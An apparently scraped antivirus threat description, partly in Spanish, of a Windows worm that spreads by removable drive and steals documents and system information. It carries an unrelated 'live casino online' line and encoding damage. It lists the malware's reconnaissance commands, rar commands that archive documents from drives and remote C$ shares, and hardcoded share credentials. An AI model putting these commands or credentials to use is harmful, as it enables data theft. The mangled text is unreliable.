live casino online

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Este malware no tiene ninguna rutina de puerta trasera.

Detalles de entrada

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

±õ²Ô²õ³Ù²¹±ô²¹³¦¾±¨®²Ô

Este malware infiltra una copia de s¨ª mismo en las carpetas siguientes con diferentes nombres de archivo:

• %User Temp%\conhost.exe ¡ú if sample is not running as this path and file name
• {Removable Drive Letter}:\RECYCLER\Dcfly.exe
• {Removable Drive Letter}:\{Folder Name in the Root Path of Removable Drive}.exe

(Nota: %User Temp% es la carpeta Temp del usuario activo, que en el caso de Windows 2000(32-bit), XP y Server 2003(32-bit) suele estar en C:\Documents and Settings\{nombre de usuario}\Local Settings\Temp y en el case de Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) y 10(64-bit) en C:\Users\{nombre de usuario}\AppData\Local\Temp).

Infiltra los archivos siguientes:

• %User Temp%\ppxxxx ¡ú Used to hide .exe file extension and to create autorun registry, deleted afterwards
• %User Temp%\tmpx5.tmp
• %User Temp%\must.bat ¡ú executes commands that acquire information about the affected machine, deleted afterwards
• %User Temp%\t.log
• %User Temp%\s.log
• %User Temp%\workgrp.tmp
• %User Temp%\hostname.tmp
• %User Temp%\sharedir.tmp
• %User Temp%\sd.t
• %User Temp%\winword4.doc ¡ú contains the stolen information from the commands executed by %User Temp%\must.bat
• %User Temp%\WPDNSE\{Encrypted Computer Name}.NLS ¡ú archive file that contains stolen files
• {Removable Drive Letter}:\RECYCLER\{Encrypted Computer Name}.NLS ¡ú archive file that contains stolen files

(Nota: %User Temp% es la carpeta Temp del usuario activo, que en el caso de Windows 2000(32-bit), XP y Server 2003(32-bit) suele estar en C:\Documents and Settings\{nombre de usuario}\Local Settings\Temp y en el case de Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) y 10(64-bit) en C:\Users\{nombre de usuario}\AppData\Local\Temp).

Agrega los procesos siguientes:

• regini.exe %User Temp%\ppxxxx
• %User Temp%\conhost.exe ¡ú if sample is not running as this path and file name
• cmd /c %User Temp%\must.bat
• %System%\cmd.exe "cmd.exe /v:on /c %User Temp%\must.bat 2"
• %System%\cmd.exe chcp
• %System%\cmd.exe netuser
• %System%\net.exe "%System%\net1 user"
• %System%\cmd.exe "net localgroup administrators"
• %System%\net.exe "%System%\net1 localgroup administrators"
• %System%\cmd.exe tasklist
• %System%\cmd.exe systeminfo
• %System%\cmd.exe "ipconfig /all"
• %System%\cmd.exe "netstat -ano"
• %System%\cmd.exe "arp -a"
• %System%\cmd.exe "netstat -r"
• %System%\NETSTAT.EXE "%System%\cmd.exe /c "%System%\route.exe" print"
• %System%\cmd.exe "%System%\route.exe print"
• %System%\cmd.exe "nbstat -n"
• %System%\cmd.exe "nbstat -c"
• %System%\cmd.exe netstart
• %System%\net.exe "%System%\net1 start"
• %System%\cmd.exe "net use"
• %System%\cmd.exe "%System%\cmd.exe /S /D /c" echo n""
• %System%\cmd.exe "net share"
• %System%\net.exe "%System%\net1 share"
• %System%\cmd.exe "net user /domain"
• %System%\net.exe "%System%\net1 user /domain"
• %System%\cmd.exe "net view domain"
• %System%\cmd.exe "%System%\cmd.exe /S /D /c" type %User Temp%\t.log""
• %System%\cmd.exe "find /i /v "------""
• %System%\cmd.exe "%System%\cmd.exe /S /D /c" type %User Temp%\s.log""
• %System%\cmd.exe "find /i /v "domain""
• %System%\cmd.exe "%System%\cmd.exe /S /D /c" type %User Temp%\t.log""
• %System%\cmd.exe "find /i /v "completed successfully"
• %System%\cmd.exe "net view /domain:"WORKGROUP""
• %System%\cmd.exe "%System%\cmd.exe /S /D /c" type %User Temp%\workgrp.tmp""
• %System%\cmd.exe "find "\""
• %System%\cmd.exe "net view \{Networked Computer Name}""
• %System%\cmd.exe "find "Disk""
• %System%\cmd.exe "ping -n 1 {Networked Computer Name}"
• %System%\cmd.exe "findstr /i "Pinging Reply Request Unknown""
• %Program Files%\winrar\rar.exe u -apC -ed-tk -dh -hpThis32lPiece -ta{Current Date} %User Temp%\WPDNSE\{Encrypted Computer Name}.NLS "{Stolen File Name}"
• %System%\xcopy.exe /d /c /i /h /r /y %User Temp%\WPDNSE\*.NLS {Removable Drive Letter}:\RECYCLER
• %System%\xcopy.exe /d /c /i /h /r /y %User Temp%\Media\*.ldf {Removable Drive Letter}:\RECYCLER
• %System%\xcopy.exe /d /c /i /h /r /y {Removable Drive Letter}:\RECYCLER\*NLS %User Temp\WPDNSE
• %Program Files%\winrar\rar.exe u -apF -r -ed-tk -dh -sl5000000 -hpThis32lPiece -ta{Current Date} %User Temp%\WPDNSE\{Encrypted Computer Name}.NLS {Removable Drive Letter}:\*.doc {Removable Drive Letter}:\*.docx {Removable Drive Letter}:\*.pdf {Removable Drive Letter}:\*.mvd {Removable Drive Letter}:\*.tif {Removable Drive Letter}:\*.xls {Removable Drive Letter}:\*.xlsx
• %Program Files%\rar.exe u -ap172.{BLOCKED}.{BLOCKED}.{2-253}\C$ -r -ed -tk -dh -sl1000000 -hpThis32lPiece -ta{Current Date} %User Temp%\WPDNSE\{Encrypted Computer Name}.NLS \172.{BLOCKED}.{BLOCKED}.{2-253}\C$\*.doc \172.{BLOCKED}.{BLOCKED}.{2-253}\C$\*.docx \172.{BLOCKED}.{BLOCKED}.{2-253}\C$\*.pdf \172.{BLOCKED}.{BLOCKED}.{2-253}\C$\*.mvd \172.{BLOCKED}.{BLOCKED}.{2-253}\C$\*.tif \172.{BLOCKED}.{BLOCKED}.{2-253}\C$\*.xls \172.{BLOCKED}.{BLOCKED}.{2-253}\C$\*.xlsx

Crea las carpetas siguientes:

• %User Temp%\WPDNSE
• {Removable Drive Letter}:\RECYCLER

(Nota: %User Temp% es la carpeta Temp del usuario activo, que en el caso de Windows 2000(32-bit), XP y Server 2003(32-bit) suele estar en C:\Documents and Settings\{nombre de usuario}\Local Settings\Temp y en el case de Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) y 10(64-bit) en C:\Users\{nombre de usuario}\AppData\Local\Temp).

T¨¦cnica de inicio autom¨¢tico

Agrega las siguientes entradas de registro para permitir su ejecuci¨®n autom¨¢tica cada vez que se inicia el sistema:

HKEY_CURRENT_USER\Software\Microsoft\
Windows NT\CurrentVersion\Windows
Load = {Malware File Path}\{Malware File name}.exe

Rutina de puerta trasera

Este malware no tiene ninguna rutina de puerta trasera.

Robo de informaci¨®n

Recopila los siguientes datos:

• From the infected machine:
  • Computer name
  • Current date and time
  • Windows version
  • Contents of %System%\boot.ini
  • List of user accounts
  • List of administrator groups
  • List of running processes
  • System information
  • IP configuration
  • Active connection and listening ports
  • List of running services
  • List of network connections
  • List of domain user accounts
  • List of domains
  • List of computers in the domain
  • List of directories in drives C:, D:, E:, F:, G:, H:, and I:

(Nota: %System% es la carpeta del sistema de Windows, que en el caso de Windows 98 y ME suele estar en C:\Windows\System, en el caso de Windows NT y 2000 en C:\WINNT\System32 y en el caso de Windows 2000(32-bit), XP, Server 2003(32-bit), Vista, 7, 8, 8.1, 2008(64-bit), 2012(64bit) y 10(64-bit) en C:\Windows\System32).

Otros detalles

Hace lo siguiente:

• It sets the attributes of folders in removable drives to Hidden and System and creates a copy of itself in the removable drive using the file name of the folder that it has hidden.
• It checks the recently opened files list, removable drives, and {IP Address}\C$ shares for files with the following extensions:
  • .doc
  • .docx
  • .pdf
  • .mvd
  • .tif
  • .xls
  • .xlsx
• It then adds the found files to the archive file %User Temp%\WPDNSE\{Encrypted Computer Name}.NLS.
• It tries to access {IP Address}\C$ shares using the following IP addresses:
  • 172.{BLOCKED}.{BLOCKED}.{2-253}
  • 172.{BLOCKED}.{BLOCKED}.{2-253}
• It uses the following username-password combination to access {IP Address}\C$ shares:
  • A\adminlocal - ht@2013
  • A\administrator - ttmt-anat
  • A\administrator - ttmt-tcv-anat
  • TCV\migrator - anat2012